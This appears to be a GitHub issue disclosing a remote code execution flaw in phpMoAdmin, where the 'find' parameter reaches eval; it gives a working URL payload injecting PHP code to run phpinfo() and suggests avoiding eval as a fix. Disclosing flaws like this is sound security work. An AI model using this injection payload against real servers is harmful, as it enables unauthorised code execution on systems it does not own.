phpMoAdmin Remote Code Execution

hi,
We found a remote code execution vulnerability in phpmoadmin that could allow an attacker to remotely execute arbitrary code to attack an attack server.
![image](https://user-images.githubusercontent.com/11308052/56874124-506e6300-6a6a-11e9-9648-16a5a0f64f9c.png)

code line in 562:   The find parameter is directly brought into the eval function.

**payload:
http://www.xxx.com/moadmin.php?db=datagovernance&action=listRows&collection=quality_control_base&find=array();phpinfo();exit**

This payload execution **phpinfo();**

![image](https://user-images.githubusercontent.com/11308052/56874154-9b887600-6a6a-11e9-8469-0cb2f6bdf914.png)

--------------------
fix:
In php, the eval function is dangerous. It is not recommended to use it. If you must use it, you need to limit the incoming data.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

phpMoAdmin Remote Code Execution #31

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

phpMoAdmin Remote Code Execution #31

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions